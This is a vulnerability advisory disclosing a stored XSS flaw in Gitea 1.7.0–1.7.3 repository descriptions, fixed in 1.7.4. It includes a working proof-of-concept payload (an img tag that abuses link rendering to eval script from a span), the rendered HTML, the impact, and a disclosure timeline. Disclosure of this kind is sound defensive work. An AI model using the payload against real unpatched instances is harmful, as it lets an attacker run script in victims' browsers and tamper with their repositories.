Gitea 1.7.3 stored HTML injection (XSS)
#######################################

Information
===========

Name:          Gitea 1.7.0 - 1.7.3 stored HTML injection
Software:      Gitea - a self-hosted Git service
Homepage:      https://gitea.io/
Vulnerability: stored HTML injection
Affected:      1.7.0 - 1.7.3
Tested:        1.7.2, 1.7.3
Fixed:         1.7.4
Prerequisites: edit repository settings
Severity:      low
CVE:           NA

Credit:        Anti RA$?is
HTML version:  https://bitflipper.eu/

Description
===========

Gitea is a self hosted git repository service, which is affected by stored
HTML injection vulnerability, allowing authenticated user to inject payload
into repository's description field. It is executed, when victim navigates
to malicious repository's code page.

Proof of Concept
================

Attacker needs to create a new public repository and set the description
containing payload.

==================== source start ========================
<img id="xss" src="http://onerror=eval(
document.querySelectorAll('span')[10].innerText)//">
<span>document.querySelector('#xss').parentNode.innerHTML='\x3cmarquee
style=color:red\x3eXSS\x3c/marquee\x3e';alert('XSS')</span>
====================  source end  ========================

Code is executed, when victim navigates to malicious repository's code page.
Following HTML snippet demonstrates the issue:

==================== source start ========================
<div id="repo-desc">
    <span class="description has-emoji"><img id="xss" src="<a
    href="http://onerror=eval(
    document.querySelectorAll(&#39;span&#39;)[10].innerText)//">"
     target="_blank" rel="noopener noreferrer">http://onerror=eval(
     document.querySelectorAll(&#39;span&#39;)[10].innerText)//"></a>
<span>
document.querySelector(&#39;#xss&#39;).parentNode.innerHTML=&#39;\x3cmarquee
style=color:red\x3eXSS\x3c/marquee\x3e&#39;;alert(&#39;XSS&#39;)</span>
</span>
    <a class="link" href=""></a>
</div>
====================  source end  ========================

Impact
======

Authenticated attacker can execute JavaScript in the victim's browser and
possibly use it to change code in victim's repository.

Conclusion
==========

New release was published as a result and vulnerability is patched in Gitea
1.7.4.

References
==========

1) New release announcement
    https://blog.gitea.io/2019/03/gitea-1.7.4-is-released/

2) Patch pull request on github
    https://github.com/go-gitea/gitea/pull/6306

Timeline
========

28.02.2019 | me                 | vulnerability discovered
28.02.2019 | me > developer     | sent report to the developers; no response
06.03.2019 | me > developer     | asked for status update
06.03.2019 | developer > me     | answer to status update: they are working
           |                    | on a patch
13.03.2019 | developer > public | patched version released
17.03.2019 | me > public        | published vulnerability details

---
Anti RA$?is
Blog: https://bitflipper.eu
Pentester at http://www.clarifiedsecurity.com